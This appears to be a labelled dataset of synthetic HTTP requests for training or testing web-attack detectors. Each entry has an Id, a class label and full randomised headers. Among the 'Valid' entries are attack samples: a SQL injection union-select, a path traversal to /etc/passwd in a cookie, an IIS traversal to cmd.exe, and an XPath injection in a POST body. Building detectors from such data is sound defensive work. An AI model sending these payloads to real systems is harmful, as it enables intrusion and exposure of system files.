kshutdownmgNjA=bndHitqOcbeio8etac&ki=39198&3Vzclog7o=eithmArtLeno&enWtNehmebof=72&kj6oabcerzlmn5=26076899&ZVStshutdown2=ivJ.Ogi&nph-0pJFbU-=ac sft/igoRas&uEuHt7like=5682&5eCi1j=ocoop&bvh_0=5694

End - Id: 32753
Start - Id: 9304
class: Valid
GET /E2iqlr0neo.tiff?les2Otoy2ej=055&E3=1m&IJX.k-1g8W=srKrmEt3&ctthtnktoltoh=54&ittIftrrktaefd=%3C&gyen3en1=81&uom52mbqhT=rN3vG&t0i0miwlls=8ni4tuEa&ebar0orxmaSlts=aAfatiEoXA HTTP/1.0
Host: www.1emihsi.com
Connection: eyrie
Accept: */*;q=0.8
Accept-Charset: windows-1258;q=0.1, iso-10646-ucs-2;q=0.1, iso-8859-2;q=0.5, us-ascii, windows-1251
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 118.187.146.217
Cookie: ojf2Cezes=aah;tolmhaLNuk=@rt
Cookie2: $Version="974"
Date: Tue, 26 Apr 05 01:10:49 CET
ETag: W/"FkAJ4vKKqht86LkE2C"
Expect: 100-continue
From: clbdsbE@ouRcuroAt.it
If-Modified-Since: Thu, 28 Sep 06 14:30:41 CET
If-Unmodified-Since: Sat, 21 Jun 08 21:01:09 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Jun 04 09:40:21 GMT
Max-Forwards: 39
MIME-Version: 8.1
Pragma: g=eell
Proxy-Authorization: NTLM aXNyb3RvbXRhbWdtbXJhZWRydXd0WWtldHRodXBhbm15ZWFvemVjcnJoTw==
Authorization: xynxhp kfsgs=adoihs
Range: 53-
Referer: /ormsaoo/sakhp/cdtau/pjmhsEry/ildks.php4
TE: deflate,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.4 (X11; U; Unix 1.3; ut-re; rv:7.9.3) Gecko/16260591
UA-CPU: 68000
UA-Disp: 7621,4110,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 766x0669
Via: 6.4 43.72.96.205, r9aa/9.2 227.10.1.107:001
Transfer-Encoding: deflate
Upgrade: ueprv/4.7, i56h/1.4, oe9/5.3, oriti/8.3, xugrra/6.0
Warning: 170 83.104.71.61 "wr0hialdc" 
X-Forwarded-For: 156.126.164.181
X-Serial-Number: 378312956268
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9304
Start - Id: 35292
class: SqlInjection
GET /iEji9u2XD62WL/gwipnh1rnmpAgf.php?orb=%3Aiyd0rm5&TgwM=jy&bthmtejissdian=3elj&u2q6aaioptmwgl=opde&ouet7v=tsrbsny4sl&6iytf=ieanl1wrs&enelGx16lgorDt=nhvJND&YnTIalbiidwmO=%3B++++exec+++++get_cust%28+++%27x%27%27+union+++select++++object_name%2Cobject_type%2C%27%27x%27%27+++++from+++user_objects+where+%27%27tAtyae%27%27++%3D+++%27%27+++%27++%29%3B&vgo3CnhavingRIfromEI=3284451&rd=828476&tf2senehoolg0=7052622&8ir=t5La%40ndeS4m HTTP/1.0
Host: 190.203.195.214
Connection: close
Accept: application/rtf, application/rtf
Accept-Charset: x-mac-arabic;q=0.2, gb2312;q=0.5, iso-8859-8-i;q=0.9, x-mac-roman, x-mac-hebrew
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 65.21.76.100
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="2"
Date: Mon, 12 Mar 07 17:22:25 UTC
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: tomlS4
From: bohfsrn3@6agvleeeda.com
If-Modified-Since: Tue, 11 Dec 07 21:04:39 CET
If-Unmodified-Since: Tue, 25 Aug 09 21:37:09 CET
If-Match: *
If-None-Match: "NmfhWOaouEAwGOleW"
If-Range: "XWUUdGnkr@6w.ThJ18"
Max-Forwards: 291
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="wwob"
Authorization: sPqta oehNstt=fnslt
Range: 930-456,2355-
Referer: /so9iat/eIU59ahl/NSa9oge/etnt/no8e.bin
TE: chunked;q=0.2
Trailer: Warning
User-Agent: lufMIte (huNGfFo; nYt1PDEpvK; p_UjhsW)
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9202x764
Via: 3.3 www.eir4am.htm, 7.1 www.jkne.png:3, 8.1 135.227.95.210
Transfer-Encoding: deflate
Upgrade: dn44o/1.3
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 019195237
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35292
Start - Id: 36250
class: PathTransversal
GET /bYp88/khDvB/rhMQizK2fAo67.php4? HTTP/1.0
Host: 182.244.217.239:80
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 16.123.19.223
Cookie: rfbtgsn=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Date: Wed, 03 Feb 10 24:16:16 GMT
ETag: "WRUTM5fLx4ug7zyc9"
Max-Forwards: 78
MIME-Version: 2.5
Authorization: NTLM ZXN0YWVoUHJyZWhyZWlBb2F3dm1obmVsZVBBaW56dWpicHR1b2xzbnNjZW9idG5F
Range: -81
Referer: /e4nh/oy1a.tar.gz
TE: gzip,chunked,chunked
Trailer: Expect
User-Agent: Mozilla/6.9 (Windows; U; WinNT 4.6; 1h-hr; rv:3.6.0) Gecko/47201138

null

End - Id: 36250
Start - Id: 33434
class: Valid
POST /BGI/nxoMyn9Gmaerori6/tlc/epHjzurvme_/ei2@/yeeDy/MDxp_f3y89Ckq6Ja.js? HTTP/1.0
Content-Length: 60
Content-Language: 2he
Content-Encoding: compress
Content-Location: http://rmisztae.com/Llhn/mhihb.cfm
Content-MD5: MHNpaXRhaGVhYkVvYWllZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 03 Jun 07 02:02:01 GMT
Last-Modified: Fri, 20 Oct 06 10:30:57 GMT
Host: www.qcsqleX.net
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.1
Cache-Control: max-stale=33
Client-ip: 117.212.192.32
Cookie: cealNe74tVik=|retmrlseiq
Cookie2: $Version="9"
Date: Wed, 28 May 08 10:40:19 GMT
ETag: W/"9AwtjROacYQZB-UM"
Expect: lnukihqa
From: airohua@gtscArwrS.org
If-Modified-Since: Tue, 20 Jun 06 05:02:16 GMT
If-Unmodified-Since: Mon, 24 Nov 08 08:46:37 CET
If-Match: "pCacP02KLTf2zQWfic"
If-None-Match: *
If-Range: *
Max-Forwards: 4125
MIME-Version: 5.1
Pragma: tdtne=eirAigtH
Proxy-Authorization: Basic cnRjZW86bnNucmZu
Authorization: Digest opaque="itei"
Range: -1,44294-,-026414
Referer: /gzBhT3.bin
TE: gzip,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/5.5 (compatible; h5sbdeasm; SunOS sun4u; aatmm9o; ssxudme)
UA-CPU: StrongARM
UA-Disp: 326,087,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 669x659
Via: FTP/9.6 www.htO7.tiff
Transfer-Encoding: compress
Upgrade: encr/4.7, csRuef/7.1, ee6/1.4, tehaa/9.8, 7en/7.5
Warning: 461 223.224.27.140 "qaade4lnwt" "Mon, 04 Sep 06 19:50:31 GMT"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 522982707
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~

wt1etshuwTb7tad=oeLg&asAmRl=~&oNE9coitcfb4td=ee&MOuECN=123

End - Id: 33434
Start - Id: 20804
class: Valid
GET /rGEJbnU6t-VBT2xqDYxe/tLLmXIFr6.GU4VoC/RlXWSfc/doa07dNiodetaihO/pa/ebrBdts@Cam/nvwTiae/crrtprETriNekioNa/bBqZg/VC_3ppJk24O-divEX.html?%uTWN15d=rFWZH3G&1ibmab4oqmsubm=9797414&whereUV.dE6linkbWG=iPr&Xhgz=9greaeehCmtoi40e HTTP/1.0
Host: 170.221.164.113
Connection: jlae
Accept: audio/x-wav, application/x-tar
Accept-Charset: windows-1257
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: min-fresh=8036
Client-ip: 207.0.235.72
Cookie: sis=fae:tt)Wcio;dh=132;Reis=7;ix2ror3=hr4atEcRr<d\so
Cookie2: $Version="38"
Date: Tue, 14 Jul 09 15:47:11 CET
ETag: "FNK7ig4kkbloREE5"
Expect: 100-continue
From: txeT@aevntoegn.com
If-Modified-Since: Tue, 03 May 05 24:18:29 GMT
If-Unmodified-Since: Fri, 20 Jul 07 21:34:15 CET
If-Match: *
If-None-Match: *
If-Range: "0fMor@H5lJecmmjz94w"
Max-Forwards: 0350
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Basic dGh0Zmw6YWJhYWY=
Authorization: Basic dHRkaHQ6YjZvaXR2
Range: 468072-,7838-92,92-4796
Referer: /evUakd/mee39tn/tenfa/mStr.ace
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.1 (Machintosh; U; PPC Mac OS X 5.6; ef-ar; rv:1.0.3) Gecko/21750021
UA-CPU: x86
UA-Disp: 404,2413,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7338x309
Via: 7.6 201.153.123.145:662
Transfer-Encoding: heke
Upgrade: nm2Tie/2.4, a4heer/9.4, scnsH/7.8, kDsMm/2.1
Warning: 115 90.6.146.88 "UeaeoahrtqltoetUu" "Wed, 19 Jan 05 05:47:16 GMT"
X-Forwarded-For: 204.193.168.184
X-Serial-Number: 39917227024822129
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20804
Start - Id: 43901
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 129.131.132.249
Connection: c2mte
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: Dssi-3jea;q=0.1, fng4t-fnse;q=0.0, ahg9o-aE3m;q=0.5, aieue1gE-ik;q=0.5
Cache-Control: xdnr='ar'
Client-ip: 10.134.75.126
Cookie: lzxi79Lu=systemdene( ;oe;ov4CystyleVul=22
Cookie2: $Version="6"
Date: Fri, 01 Dec 06 20:30:10 GMT
ETag: "Ep17MfiXz7naL9aGqdZ"
Expect: Hxttny
From: pni8hEt@brlOo.ch
If-Modified-Since: Fri, 07 Apr 06 15:48:31 CET
If-Unmodified-Since: Mon, 29 Nov 04 07:23:02 UTC
If-Match: "jKUn1uB_dS@PuHGmr"
If-None-Match: "YPxlz7._xFR2j-Bam"
If-Range: "G9oma_6ANI6gezVOqf"
Max-Forwards: 031
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM dGxFdHRpbnNuZXRwZmlwU2NjcGVucmk5bWFkbXFhbGhlb2FmZQ==
Authorization: NTLM ZmN6YWFyM3R5aXVhRXRlY210bnhldG5ldWVsbXQ2cnJpeWE3RTF1ZHJudQ==
Range: -966214,45-83
Referer: http://www.Uqysl.cz/omSairse/ol6nelr/cmijerl/yEca.png
TE: chunked;q=0.2,chunked;q=0.2,gzip
Trailer: If-Match
User-Agent: saxS/0.6
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 349x5070
Via: 9.0 239.185.121.92:97478
Transfer-Encoding: deflate
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43901
Start - Id: 20994
class: Valid
GET /foimoeiq1/ngjsdllewswtneBw/tfK5FOGN80QxUjj6/ie2ernow/nettzoshen/nr9Agys/qUOy6.DD6-J2VGWS/iGq2@4/1hr/n7aL_fL.asmx? HTTP/1.0
Host: www.chamtre.net:71499
Connection: close
Accept: text/*;q=0.4, image/jpeg;q=0.4
Accept-Charset: koi8-r
Accept-Encoding: identity
Accept-Language: *;q=0.2
Cache-Control: max-age=79551
Client-ip: 190.238.167.107
Cookie: 8n=7286;lasLe=t@jykJkVG
Cookie2: $Version="40"
Date: Wed, 01 Aug 07 10:27:26 GMT
ETag: "S7dOFY9qGkegqB6"
Expect: 100-continue
From: ahynt@dfll.st
If-Modified-Since: Sun, 18 May 08 05:07:27 GMT
If-Unmodified-Since: Tue, 08 Aug 06 20:11:26 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 29 Jan 06 23:47:35 CET
Max-Forwards: 5793
MIME-Version: 3.6
Pragma: f04rA='nhoz'
Proxy-Authorization: taay MaVfmd=b1vtgae
Authorization: sr4att hmteT=brtil
Range: 9864-14,-53
Referer: /tnElwato/Nsbtei/sMwlmins.nsf
TE: trailers,chunked;q=0.3
Trailer: Pragma
User-Agent: Mozilla/3.6 (Machintosh; U; PPC 3.2; oi-oe; rv:3.7.8) Gecko/83061060
UA-CPU: 68000
UA-Disp: 665,0570,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 627x4845
Via: FTP/1.9 167.125.154.3, FTP/3.2 www.AsrEhwea.jpg, FTP/3.3 www.sAle.gif
Transfer-Encoding: uenuan; ea16il7e=fteoLs
Upgrade: wrn/1.7, tal/7.3, xhsnbh/3.1, taut/3.1
Warning: 723 www.jqsOhsod.jpeg "oaec" "Mon, 17 May 04 15:05:20 GMT"
X-Forwarded-For: 124.152.206.172
X-Serial-Number: 72612328248662320095
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20994
Start - Id: 13887
class: Valid
GET /u3BGRoGjfwQTE/1Ien/N3fotsh/6u1wKHmjQ1-8wgnBc2Gb/hNmjIUGi4n76B2W3gQF/uze2zeZpGZHS_/gPNuuO0N-UGth/dcd7hyotCzn9sutm4/e2vwiBQ4j6byLGEE.r/pqu-rmvM/ioso1ah.asp?tre=deelh&nAth5bO=%5Byormuwgetsl7we&tioerayanEaNgt=eak6&indttesaetenthe=846263&eevn9h=Om&ok=1128535&llsq0dbsam=6tsn7ae1H+r&s@TqPeaHu2Ztmp=elmr HTTP/1.1
Host: www.aeis.gov:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tdsatmo-idat;q=0.0, obsasts0-Esead;q=0.9, i-shme0l, ztnvsods-o;q=0.8
Cache-Control: n=eEuta
Client-ip: 174.37.26.127
Cookie: tHflgnhet0bw5t=72563;erfSOrncmSeh=sa
Cookie2: $Version="2"
Date: Thu, 03 Jun 04 06:00:40 UTC
ETag: W/"UzkU53@-de6bwowOH7ON"
Expect: 100-continue
From: aopeat@lwiRaar.be
If-Modified-Since: Sun, 19 Apr 09 07:33:23 UTC
If-Unmodified-Since: Thu, 26 Nov 09 07:56:42 UTC
If-Match: *
If-None-Match: "fxi7D.JQ9g0ZMix"
If-Range: Mon, 21 May 07 24:39:55 UTC
Max-Forwards: 44
MIME-Version: 9.2
Pragma: dwsl5=ddsf
Proxy-Authorization: 69sr aeSoonsr=ixten
Authorization: Basic dHVkb0U6YU13ZA==
Range: -52,788-774
Referer: /efakahc/g0pok9/be2et/tqkle/atas.asp
TE: deflate,trailers,trailers
Trailer: Range
User-Agent: Mozilla/2.4 (Machintosh; U; PPC Mac OS X 7.2; sA-i4; rv:5.7.3) Gecko/85227857
UA-CPU: StrongARM
UA-Disp: 4060,2972,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7739x7906
Via: 5naiM/0.7 www.tInneta.html
Transfer-Encoding: ctmr7
Upgrade: d3bfi/2.4, EhWrnN/9.4
Warning: 098 16.209.158.37 "jtcOeZythsytt9zaQlpa" "Sat, 23 Jul 05 18:39:08 GMT"
X-Forwarded-For: 150.165.127.46
X-Serial-Number: 02052575004924
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13887
Start - Id: 27540
class: Valid
GET /ee/tdcr.tiff?5o7=94&eu=es&dmskntt7atin9=lw&1Uxxsqgico=i3n7wCYAia&oosh=Hdsu-Keval%7C%24dida+w+m&Ao0l1tgn=6TlUgKKCqt&hLo1=mTcu%2Beisom&A5ntliohd1rrdii=4 HTTP/1.1
Host: www.hIzmsbt1.uk
Connection: tnelioa
Accept: image/png;q=0.0
Accept-Charset: x-mac-greek;q=0.8, x-mac-arabic;q=0.7, macintosh;q=0.9, windows-1253;q=0.4, windows-1254
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 252.13.177.85
Cookie: e6=62 otoWwel;tsch1os5ortI3=De ansmesAh;uueNiadzrae=hcopyrns;7NEn=)[bopsi'EeL6ucmd2h
Cookie2: $Version="154"
Date: Fri, 13 Jun 08 12:11:47 CET
ETag: W/"7JbduUKYLHlFy9.1H8_"
Expect: 100-continue
From: ru4em6@gcCndrd.cz
If-Modified-Since: Wed, 16 Apr 08 02:27:40 GMT
If-Unmodified-Since: Mon, 11 Sep 06 08:26:57 GMT
If-Match: *
If-None-Match: *
If-Range: "BeUnN4T_4ikAvf7"
Max-Forwards: 61
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: htrtl efzt=gadB
Range: -46102,418194-41076
Referer: /ie5ae3ob/n4su1g/lslhgfot/tduuethI.mpeg
TE: trailers
Trailer: Max-Forwards
User-Agent: nLs7lm (aa2-cwx; stSw-0@1; osIn0NyXlY; l9JecDHJDB; vleoysD)
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 412x989
Via: FTP/3.5 www.tefo.jpeg, 6.6 159.133.55.43, nco/5.2 175.168.162.143:07309
Transfer-Encoding: tjcora; wa6hn=Ces1fAc
Upgrade: Npnao/5.5, 7inei/1.4, 1fe/9.6
Warning: 807 www.tHT4nsBw.tiff "eatatio9t9Iq3" 
X-Forwarded-For: 224.28.160.220
X-Serial-Number: 03769
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27540
Start - Id: 31610
class: Valid
GET /tqonlsivwzOn.nsf?nrtrTeroOa=29538&the=tf7Q&jlrpueltiobedKz=itF4Thebotde&d0nmfd3=09&1e6H1ao2De=87&edtm=77841 HTTP/1.0
Host: www.u74dotmrm.net:341
Connection: close
Accept: */*
Accept-Charset: koi8-r;q=0.4, isiri-3342;q=0.0, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: htsdr3z-eqy;q=0.4
Cache-Control: max-stale=54
Client-ip: 160.28.85.154
Cookie: qdiatsda2sdse=ny1ISWxa;hstmoe=mincludeyIo;w8eshertn==hwhererm;nE=btdeleteic;chtk5=nplt0mt9;OrledOt=epgs
Cookie2: $Version="083"
Date: Wed, 30 Jul 08 19:46:22 UTC
ETag: "4FAc8E4FJFqY-OzxW"
Expect: 100-continue
From: Seenwnj@easRlfj.biz
If-Modified-Since: Wed, 14 Apr 04 20:31:08 GMT
If-Unmodified-Since: Thu, 25 Dec 08 17:25:15 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 03 Jan 08 05:02:59 CET
Max-Forwards: 34
MIME-Version: 1.8
Pragma: sejiaen=ndruev
Proxy-Authorization: Digest response="FD8ADbEE2Add907cB1Da0CFF05F24cbe"
Authorization: Basic d2NlMnNlOmZzc2VlZWV4
Range: 5371-591092
Referer: http://www.hsheos.ch/emdfn/oevpe7ne/Ssetizt/lRdFulo.conf
TE: deflate,trailers,trailers
Trailer: Upgrade
User-Agent: nceefeitcn/1.9.1
UA-CPU: PowerPC
UA-Disp: 4808,8139,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3066x402
Via: HTTP/0.1 27.240.124.186, FTP/2.8 www.rsY9o1si.shtml:670, FTP/3.7 www.wmme.tiff
Transfer-Encoding: gzip
Upgrade: dmyle/0.4, eeo/3.5
Warning: 137 244.132.47.139 "naatanasiuutzeseht" "Tue, 25 Mar 08 09:31:18 UTC"
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 0401197153932
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31610
Start - Id: 1863
class: Valid
GET /yW9YCM/NexecZPCxml@/rFJhnetcat5.n0ff2.pl?reeanpoelh=75199949 HTTP/1.0
Host: 30.195.67.82
Connection: keep-alive
Accept: audio/*;q=0.5, image/*;q=0.2, application/zip
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.8, deflate, identity, gzip
Accept-Language: *
Cache-Control: min-fresh=5
Client-ip: 188.102.222.214
Cookie: 2hHeiNzey6nttGr=ao0vAft:sz4gwheref;g3Ro=2anvi;0eOi=aieasm;dnehseeiesl=2005;rui3le=aVMFV07aU;e5Tabis=030
Cookie2: $Version="36"
Date: Fri, 08 Jan 10 18:20:12 CET
ETag: "Ty0wDG9@E2TZkjfe"
Expect: 100-continue
From: utOro@brnnglI.fr
If-Modified-Since: Sat, 17 Apr 10 12:46:57 UTC
If-Unmodified-Since: Sat, 21 Feb 09 02:08:19 CET
If-Match: *
If-None-Match: "To2JtdrmX0kd@WpL8gRs"
If-Range: Thu, 23 Jul 09 23:54:43 CET
Max-Forwards: 123
MIME-Version: 9.5
Pragma: 6t='luz'
Proxy-Authorization: oeit cahI=ti1tlwm
Authorization: Digest algorithm=tanacn
Range: -4,19022-,558645-4370
Referer: http://www.aknn.de/nfGt/uyzl/hyROo.nsf
TE: trailers
Trailer: Range
User-Agent: Mozilla/1.4 (compatible; aly01T; Solaris; wre8; 9qtEer3; atdeozretm)
UA-CPU: PowerPC
UA-Disp: 171,774,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 063x9656
Via: 2.3 www.edsjob.gif
Transfer-Encoding: identity
Upgrade: ue0/2.4, itqt5/5.4, 6Erms/1.3
Warning: 195 79.247.8.91 "v9omtairreetwatxt" 
X-Forwarded-For: 120.197.169.25
X-Serial-Number: 0502244013679080099
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1863
Start - Id: 3439
class: Valid
GET /sSPBBiQpqf/iby2G/tKmXOEB8EKzj/0y_L2hTcMfLH99/XbYdh.aspx?eic4aeamrhnb=141&tnwrnunnstrwbun=1tu%2B%2BauOeoeemetaa9s%3A&hrneq5=%26efbs8sciEm&m9daclmrai=tIy9&@zOlKkZuxLnph-h=sl6%28%24%5Crlocation HTTP/1.0
Host: 62.16.219.162:2950
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek;q=0.7, iso-8859-7;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: censlSe-ae;q=0.9, 8-Ii2eutuh, rmi-es16e3o;q=0.9, daedd-nt2yoye
Cache-Control: no-store
Client-ip: 174.167.65.107
Cookie: ctarAoxu=7056589;Iilloh=55608
Cookie2: $Version="90"
Date: Thu, 24 May 07 10:30:13 CET
ETag: W/"-ux1L@tJgN0cXsjizl_"
Expect: sstme=eTehehs;lsJr=etacnI
From: otEj@3satd.de
If-Modified-Since: Wed, 13 Jul 05 14:02:42 UTC
If-Unmodified-Since: Mon, 16 Nov 09 06:31:15 GMT
If-Match: "dR-jdKLA28M8g.X7or"
If-None-Match: *
If-Range: "k0TnObcZBJ81AMZdNt"
Max-Forwards: 36
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: oelm rVeossvy=Pglhhhii
Authorization: NTLM U29ycmVOaW1lR3R3YmFuYWV6ZXRuaW9vc2FreWVwQXA=
Range: -6996,99-,544748-05471
Referer: /Ntm2/qeosm/innax9/nrprhdn3.png
TE: deflate;q=0.3
Trailer: Date
User-Agent: Mozilla/0.5 (Windows; U; Win 9x 7.3; nt-pe; rv:7.9.6) Gecko/18068868
UA-CPU: MIPS
UA-Disp: 426,091,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 969x7653
Via: eIsj/4.9 62.251.225.209
Transfer-Encoding: compress
Upgrade: he2aGa/7.2, t4cmu/0.8
Warning: 985 www.elsrdUt.shtml "irhbaiTogi7reAzgTe5" "Tue, 31 May 05 01:52:52 UTC"
X-Forwarded-For: 60.74.245.251
X-Serial-Number: 80963840971
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3439
Start - Id: 48662
class: XPathInjection
POST /uTvu2bvm4h6F4l/5Mamyhlaggt/SxSt40FoYRKg-p/iu6qi/rlezsoZotmTwi/ea.css? HTTP/1.0
Content-Length: 246
Content-Language: ariktra
Content-Encoding: identity
Content-Location: /0stT1.mspx
Content-MD5: dG5FZWVzYWVjT2Zna3NsdA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Dec 04 22:52:15 CET
Last-Modified: Wed, 14 Dec 05 16:26:41 CET
Host: www.ttekld.biz
Connection: close
Accept: */*
Accept-Charset: iso-8859-9;q=0.3, gb2312, x-mac-korean;q=0.5, us-ascii
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 125.212.241.80
Cookie: cinzmeet77jw=8273955;skn8u=qnxiFojLcbm6
Cookie2: $Version="57"
Date: Tue, 12 Dec 06 18:27:39 UTC
ETag: "VLqyCk.CKfLHgYarbRgi"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Sat, 21 Jul 07 03:29:41 GMT
If-Unmodified-Since: Sat, 15 Sep 07 12:25:35 UTC
If-Match: "6mmMMgBTJ-fziOhaiZYm"
If-None-Match: *
If-Range: "pSpDZdI0j2UD46mlVMac"
Max-Forwards: 2
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Tbena sv18tb=rrtc1i
Authorization: NTLM ZWJlZnVjdHplbndhZWVkb2FUY2pkb21OVGRubXN0dHVzbG5oeHRlSDVqNWc=
Range: 12-
Referer: /iet9e/lgaoprko/ttm9/hqojsia.js
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: thhlrt (ulrukw; uq2jMc4@6; u8P4mAv; dpQeF2)
UA-CPU: x86
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: HTTP/3.0 www.rultehs.html, 3.8 193.254.34.238
Transfer-Encoding: compress
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 958 171.58.48.221:65022 "tbsyeeovlI4la7he" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 9550547356245150782
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

4ilzGtmpNbepy=an8&r8iwvsnscheap=wr2m&tnPk7ttrttat8=3498&aeea5ds8oask=i6ettt&feS7pL7s=528115&vhlhc9fo=uwontthiaaetToardd&rLFwi0ZcR=;Tlee&qintewg=s8i_FcQ&moiarabo=d3o9bo'   or   6 < count(path/child::*)     or  'wiV'  =    '

End - Id: 48662
Start - Id: 628
class: Valid
GET /SI0vRTx6p/7wT5@tmHig0Jf/eahqe/s5jphwUVvD/io_2p8P0KWwQBkUhp@/aJ3j18H9QG4JHlN5HQDu/tlobbohiivqhwfeosipd/BsrTeTEta/arcf.php?T7ws5Rmog=lxwl4jLhf%401m&dleeq5=896792526&edqer=%3Almineh+c+&eiaoiahopnsq=333&eeog=82466946&gicafetxfsmot=%2Fab%2FpqDr3gb+rowindow.opent&5Z91WcO6M4=orerq5&.sDnBFH=nkuj&sy3ems=oautoexec&cn1e=ucXC&a86nilIegi9=s1vc8nentch9retk&fe=i&zeotgjAneig=33 HTTP/1.0
Host: www.8ctt11nsce.com
Connection: close
Accept: application/zip
Accept-Charset: x-mac-arabic, x-mac-korean;q=0.0, x-mac-greek;q=0.7
Accept-Encoding: deflate;q=0.7, gzip;q=0.3, compress, deflate;q=0.4
Accept-Language: eM-o, hcplmais-itnm;q=0.8, rerce2-nrn5ziSg, hw47EE-W;q=0.9, iao-sCoaN7no
Cache-Control: min-fresh=86805
Client-ip: 196.106.7.43
Cookie: 5shpSEBIE=4cHd5zsnen~q;6eeoodfedAi=qicr;7xwd9nj=5314;te=484;vs=hi kmailt;aosQis=43
Cookie2: $Version="12"
Date: Sat, 22 Aug 09 18:04:11 CET
ETag: "t3_R8tNZtPZMq@5@O"
Expect: owRwMo
From: ystebe@hnBteRt6v.be
If-Modified-Since: Wed, 21 Apr 10 15:33:04 GMT
If-Unmodified-Since: Wed, 05 Apr 06 12:11:47 UTC
If-Match: "rnDQG4G_GiiR@cbHvQ"
If-None-Match: *
If-Range: Sat, 27 Sep 08 24:52:15 CET
Max-Forwards: 94
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: NTLM all0bmFoaXVuYWNhYW9yNG8xYXdFbnJ0YXloNXNhT3NyYmFCb2VleXQ=
Authorization: NTLM YmFrRGFlbnM0VEFldGhlaXRyaGFidHB0bm9leWVvNGZPMXg0ZGMzaDdhZHNlVA==
Range: 0-,76-659886
Referer: /nite/cEelowna/ectE/esmnttt/tdr8ourv.dll
